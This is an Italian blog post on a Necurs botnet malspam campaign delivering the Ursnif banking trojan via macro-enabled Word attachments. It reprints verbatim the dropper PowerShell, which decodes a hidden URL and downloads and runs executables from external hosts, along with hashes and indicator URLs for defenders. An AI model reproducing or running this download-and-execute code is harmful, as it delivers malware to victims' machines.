Il Team di Cisco Talos ha condiviso l’analisi della nuova ondata Malspam della Botnet Necurs (link).
Quest’ultima è sicuramente fra le botnet più attive al mondo, in grado di generare enormi quantità di Spam. Le mail malevole inviate contengono Ransomware e Trojan Bancari (Ursnif, Panda Banker o Emotet).
L’apertura del documento malevolo e la conseguente abilitazione del contenuto (abilitazione della Macro), avvia il processo di compromissione del sistema.
Di seguito una breve analisi del Malware bancario Ursnif:
L’allegato malevolo risulta essere un file doc dal nome: [NOMEAZIENDA]_Richiesta – [Cognome dipendente].doc
L’apertura del file e l’abilitazione dei contenuti permette l’avvio del codice malevolo, in particolare è avviato un comando Powershell con i parametri:
$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(“aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA=”));(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + ‘\valabyhuh.exe’); Start-Process $env:APPDATA’\valabyhuh.exe’;Write-Host “bAbYgiramOpEPY”;$iARAPUmOPaJeS = New-Object System.Net.NetworkCredentia
l(“lUpIaaKAXuqexOGybu”,”lUpIaaKAXuqexOGybu”).SecurePassword;(New-Object System.Net.WebClient).DownloadFile(‘http://91.210.104.247/porn.jpg’, $env:APPDATA + ‘\stat.exe’); Write-Host “FYFopIsYpUjurof”;Start-Process $env:APPDATA’\stat.exe’;$jOCOdeFOLUXALoNA = “nuqoLuSAwEjOdE”,”iiQOCOhERiJYsyie”,”qIhyGAtYlebimycuaUf”,”bYtURYGunUtiKe”,”pazuWeXOQoFIzIQUaUhe”;Exit;
Il codice eseguito avvia il download di 2 file eseguibili:
- valabyhuh.exe
- MD5: fa37eb66b10eb030e777af9420ffce9a
- SHA1: 92b86fcdb6bc0fcdbb60478e41456d5b565410ce
- SHA256: 856e8c8716fa5afac747efcd8acfe1488c703f1b8620dd567b2b7543458c5d69
- stat.exe
- MD5: 2ca1f87a624245db0a57bf439b71d460
- SHA1: 2f6de1b66d8021b74ebcee0040b9a7c00b61d231
- SHA256: 06af68780ff670177daf0d6e34918976a46f9e69787a284b8757470fb02903b3
Traffico di rete generato:
Indicatori di Compromissione:
- http:// 91.210.104.247/emotet.txt (GrandSoft EK related)
- http:// 45.227.252.241/linnealva/kitea.dlm
